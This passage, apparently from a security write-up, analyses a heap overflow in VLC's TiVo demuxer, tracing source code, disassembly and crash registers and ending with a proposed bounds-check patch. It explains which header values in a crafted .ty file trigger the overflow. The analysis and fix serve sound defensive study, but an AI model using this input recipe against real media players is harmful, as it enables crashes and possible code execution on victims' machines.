Further down in the function, a memcpy call is made which takes i_map_size bytes from the mst_buf buffer and writes to the memory location pointed to by seq_table (the pointer returned from our previous malloc call [12]).

memcpy(p_sys->seq_table[i].chunk_bitmask, &mst_buf[8], i_map_size);	[12]

Source Code Vulnerability Analysis

With an understanding of the source code, let’s analyze the vulnerability… Given i_map_size is a signed integer [1], if we set it to a negative number, say -1 (or FFFFFFFFh) [4] and set i to a value of 7 [6], we can get an i_seq_table_size equal to 1 [7]. Keep in mind, we can set the values of i_map_size and i arbitrarily [4] [6] since these values are parsed directly out of mst_buf which comes from user-supplied input. Now, when malloc is called [8] the size will be 16 (i_seq_table_size which is 1 multiplied by _sizeof(ty_seq_table_t) which is 16) which will return a pointer to a memory region with at-least 16 bytes of memory. Of note here is this is a relatively SMALL memory region (one that would be easier to overflow).

uint8_t mst_buf[32]; [1]
...
i_map_size = U32_AT(&mst_buf[20]);  /* size of bitmask, in bytes */	[4]
p_sys->i_bits_per_seq_entry = i_map_size * 8;
i = U32_AT(&mst_buf[28]);   /* size of SEQ table, in bytes */	[6]
p_sys->i_seq_table_size = i / (8 + i_map_size);	[7]

/* parse all the entries */
p_sys->seq_table = malloc(p_sys->i_seq_table_size * sizeof(ty_seq_table_t)); [8]

Within the for loop declaration [9], we see it should execute i_seq_table_size amount of times which we know is 1 (so it should only iterate once through). Unlike the stack-overflow condition seen in a previous post, the stream_Read call within the for loop should execute with no issues (no overflow condition) as it is merely writing 7 bytes from the input stream into mst_buf [10]. In order to bypass the if condition [11] (which must be done to get to the memcpy function), i_map_size must be <= 8, which we know it is as we had previously set it to -1 (FFFFFFFFh). Finally, we get to the memcpy call [12] which writes FFFFFFFFh bytes from mst_buf into the memory location pointed to by seq_table. Since memcpy uses the FFFFFFFFh size value as an unsigned value, this is a very large amount of data it attempts to write into memory which overflows the allocated memory buffer which was only 16 when first passed to the malloc function earlier. This will result in an access violation and the program crashes due to overflowing the heap buffer!

for (i=0; i<p_sys->i_seq_table_size; i++) { [9]
    stream_Read(p_demux->s, mst_buf, 8 + i_map_size); [10]
    p_sys->seq_table[i].l_timestamp = U64_AT(&mst_buf[0]);
    if (i_map_size > 8) {	[11]
        msg_Err(p_demux, "Unsupported SEQ bitmap size in master chunk");
        memset(p_sys->seq_table[i].chunk_bitmask, i_map_size, 0);
    } else {
        memcpy(p_sys->seq_table[i].chunk_bitmask, &mst_buf[8], i_map_size);	[12]

Assembly Code Vulnerability Analysis

Analysis of the vulnerability continues by inspecting the disassembled code…

Initializing i_map_size variable from the mst_buf buffer

After the first of the two stream_Read calls (0x61401C1F), the FFFFFFFFh value passed in via the user inputted .ty file is loaded (via instructions 0x61401C24-0x61401C62) onto the stack and stored at offset 0x0629FB04 (ESP+A0).

61401C24   0FB6B424 D400000>MOVZX ESI,BYTE PTR SS:[ESP+D4]
61401C2C   0FB69C24 D500000>MOVZX EBX,BYTE PTR SS:[ESP+D5]
61401C34   0FB68C24 D700000>MOVZX ECX,BYTE PTR SS:[ESP+D7]
61401C3C   0FB69424 D600000>MOVZX EDX,BYTE PTR SS:[ESP+D6] ;these 4 grab FFFFFFFF from mst_buf stored on stack
61401C44   C1E6 18          SHL ESI,18
61401C47   89B424 A0000000  MOV DWORD PTR SS:[ESP+A0],ESI
61401C4E   C1E3 10          SHL EBX,10
61401C51   099C24 A0000000  OR DWORD PTR SS:[ESP+A0],EBX
61401C58   C1E2 08          SHL EDX,8
61401C5B   098C24 A0000000  OR DWORD PTR SS:[ESP+A0],ECX ;these 6 instructions convert endianness of bytes from input buffer
61401C62   099424 A0000000  OR DWORD PTR SS:[ESP+A0],EDX ;storing in 060BFB04

Initializing i variable from the mst_buf buffer

The i variable has the user inputted value loaded into it from the mst_buf array. This value is stored on the stack at ESP+A4

61401C83   0FB68424 DC00000>MOVZX EAX,BYTE PTR SS:[ESP+DC]
61401C8B   0FB6B424 DD00000>MOVZX ESI,BYTE PTR SS:[ESP+DD]
61401C93   0FB69C24 DF00000>MOVZX EBX,BYTE PTR SS:[ESP+DF]
61401C9B   0FB68C24 DE00000>MOVZX ECX,BYTE PTR SS:[ESP+DE] ;grabs DWORD from input buffer
61401CA3   C1E0 18          SHL EAX,18
61401CA6   C1E6 10          SHL ESI,10
61401CA9   09F0             OR EAX,ESI
61401CAB   C1E1 08          SHL ECX,8
61401CAE   09D8             OR EAX,EBX
61401CB0   09C8             OR EAX,ECX
61401CB2   89BC24 A4000000  MOV DWORD PTR SS:[ESP+A4],EDI ;store i value on stack

i_seq_table_size expression

At instruction 0x61401C70 the i_map_size value is loaded into EDI from the stack. 8 is added to it and then it is stored at an address on the stack.

61401C70   8BBC24 A0000000  MOV EDI,DWORD PTR SS:[ESP+A0]
…
61401C80   83C7 08          ADD EDI,8
…
61401CB2   89BC24 A4000000  MOV DWORD PTR SS:[ESP+A4],EDI

The stack now looks like…
0629FB04 FFFFFFFF ÿÿÿÿ
0629FB08 00000007 …

From here, the rest of i_seq_table_size is calculated.

61401CB9   99               CDQ ; sign extend EAX into EDX
61401CBA   F7BC24 A4000000  IDIV DWORD PTR SS:[ESP+A4]
61401CC1   8985 C8BE0000    MOV DWORD PTR SS:[EBP+BEC8],EAX

malloc call

EAX, now with a value of 1 is shifted left to get a value of 10h (which is 16) and malloc is called with this size value. (Remember, malloc was called with a value of 16 as this is the size of ty_seq_table_t.)

61401CBA   F7BC24 A4000000  IDIV DWORD PTR SS:[ESP+A4] ; SETS EAX to 1
…
61401CC7   C1E0 04          SHL EAX,4
61401CCA   890424           MOV DWORD PTR SS:[ESP],EAX
61401CCD   E8 4E580000      CALL <JMP.&msvcrt.malloc>

malloc returns with a memory pointer in EAX of (in my case it is 0x04909420.)

No stream_Read overwrite issue

The following assembly instructions set up the second stream_Read call which has a size value parameter of 7 which will not overwrite the mst_buf size of 32.

61401D4A   894C24 04        MOV DWORD PTR SS:[ESP+4],ECX ;pointer to mst_buf
61401D4E   897424 08        MOV DWORD PTR SS:[ESP+8],ESI ;size value of 7
…
61401D57   893C24           MOV DWORD PTR SS:[ESP],EDI ;pointer to P_demux stream
61401D5A   E8 31510000      CALL <JMP.&libvlccore.stream_Read>

Bypass if statement

The following shows the if statement in assembly ensuring that i_map_size is not greater than 8.

61401EA5   83BC24 A0000000 >CMP DWORD PTR SS:[ESP+A0],8
61401EAD   894C3B 04        MOV DWORD PTR DS:[EBX+EDI+4],ECX
61401EB1  ^0F8F 3AFEFFFF    JG libty_pl.61401CF1 ; This jump is not taken as it is not greater

memcpy call

The following instructions set up and execute the memcpy.

61401EBF   8B9424 A0000000  MOV EDX,DWORD PTR SS:[ESP+A0] ; FFFFFFFF into EDX
61401EC6   01F1             ADD ECX,ESI ; ECX is 0 so this sticks ESI (malloc pointer) into ECX
61401EC8   83FA 07          CMP EDX,7 ; Compares EDX FFFFFFFF to 7
61401ECB   8D79 08          LEA EDI,DWORD PTR DS:[ECX+8] ;
61401ECE   8DB424 C8000000  LEA ESI,DWORD PTR SS:[ESP+C8] ;LEA on ESI which has malloc result pointer
61401ED5   76 29            JBE SHORT libty_pl.61401F00 ; continues on as last CMP set to 1
61401ED7   F7C7 04000000    TEST EDI,4 ; EDI is not 4 (its a memory pointer)
61401EDD   74 21            JE SHORT libty_pl.61401F00 ; this jump happens

Which jumps to…
61401F00   89D1             MOV ECX,EDX ; moves FFFFFFFF into ECX
…
61401F09   F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> ; memcpy

Here is a look at the registers at the time of the crash.

Registers at time of crash
EAX 00004A00
ECX 3FFF16CA
EDX FFFFFFFF
EBX 0487AEE8
ESP 061BFA64
EBP 047F7CE0
ESI 061FA000
EDI 048B53C4
EIP 61401F09 libty_pl.61401F09

The access violation occurs during the course of the memcpy call (specifically during the REP MOVS instruction). The violation references the memory address stored in ESI. This is evidence of the heap overflow!

61401F09   F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> ; memcpy

Patching the Code

The issue with the heap overflow described above is that you can have a memcpy that attempts to copy data of size i_map_size (which can be arbitrarily set and very large) into a small buffer. The only validation of i_map_size is done via the if condition [11] which checks to see if it is greater than 8. What this doesn’t consider is whether i_map_size is some value 0 or smaller (even up to FFFFFFFFh!). Implementing more robust validation of i_map_size to ensure it can only be a value between 1 and 8 is one way to mitigate the vulnerability.

So if we changed …

if (i_map_size > 8) {

to…

if (i_map_size < 1 || i_map_size > 8) {

then this could solve the issue!

Source Code

static void parse_master(demux_t *p_demux)
{
    demux_sys_t *p_sys = p_demux->p_sys;
    uint8_t mst_buf[32]; [1]
    int i, i_map_size; [2]
    int64_t i_save_pos = stream_Tell(p_demux->s);
    int64_t i_pts_secs;

    /* Note that the entries in the SEQ table in the stream may have
       different sizes depending on the bits per entry.  We store them
       all in the same size structure, so we have to parse them out one
       by one.  If we had a dynamic structure, we could simply read the
       entire table directly from the stream into memory in place. */

    /* clear the SEQ table */
    free(p_sys->seq_table);

    /* parse header info */
    stream_Read(p_demux->s, mst_buf, 32);	[3]
    i_map_size = U32_AT(&mst_buf[20]);  /* size of bitmask, in bytes */	[4]
    p_sys->i_bits_per_seq_entry = i_map_size * 8;
    i = U32_AT(&mst_buf[28]);   /* size of SEQ table, in bytes */	[6]
    p_sys->i_seq_table_size = i / (8 + i_map_size);	[7]

    /* parse all the entries */
    p_sys->seq_table = malloc(p_sys->i_seq_table_size * sizeof(ty_seq_table_t)); [8]
    for (i=0; i<p_sys->i_seq_table_size; i++) { [9]
        stream_Read(p_demux->s, mst_buf, 8 + i_map_size); [10]
        p_sys->seq_table[i].l_timestamp = U64_AT(&mst_buf[0]);
        if (i_map_size > 8) {	[11]
            msg_Err(p_demux, "Unsupported SEQ bitmap size in master chunk");
            memset(p_sys->seq_table[i].chunk_bitmask, i_map_size, 0);
        } else {
            memcpy(p_sys->seq_table[i].chunk_bitmask, &mst_buf[8], i_map_size);	[12]
        }
    }

================= CODE BREAK =====================

#define TIVO_PES_FILEID   ( 0xf5467abd ) [13]

================= CODE BREAK =====================

/* check if it's a PART Header */
    if( U32_AT( &p_peek[ 0 ] ) == TIVO_PES_FILEID )	[14]
    {
        /* parse master chunk */
        parse_master(p_demux); [15]
        return get_chunk_header(p_demux);
    }